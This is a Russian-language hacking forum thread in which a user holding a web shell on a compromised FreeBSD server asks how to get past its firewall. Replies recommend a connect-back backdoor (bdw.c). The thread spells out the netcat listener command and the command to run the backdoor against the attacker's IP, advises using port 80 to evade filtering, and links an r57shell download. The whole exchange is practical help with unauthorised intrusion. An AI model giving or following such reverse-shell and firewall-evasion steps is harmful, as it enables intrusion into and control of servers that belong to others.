![]() |
Обойти фаерволл в FreeBSD
Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
|
Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо). :] |
scorpion, юзай Connect-Back Backdoor.
bdw.c Цитата:
|
Что-то я стормозил... Дейсвительно, так проще. :]
|
Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации :)))) |
VIRGOZ
Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я??? |
scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
|
Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит.. |
Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???
Где взять такой перл шелл??? P.S За хорошую помощь поднимаю репутацию всегда... |
А разве твой шел не от rst ? :p
Цитата:
http://rst.void.ru/download/r57shell.txt |
| Время: 15:15 |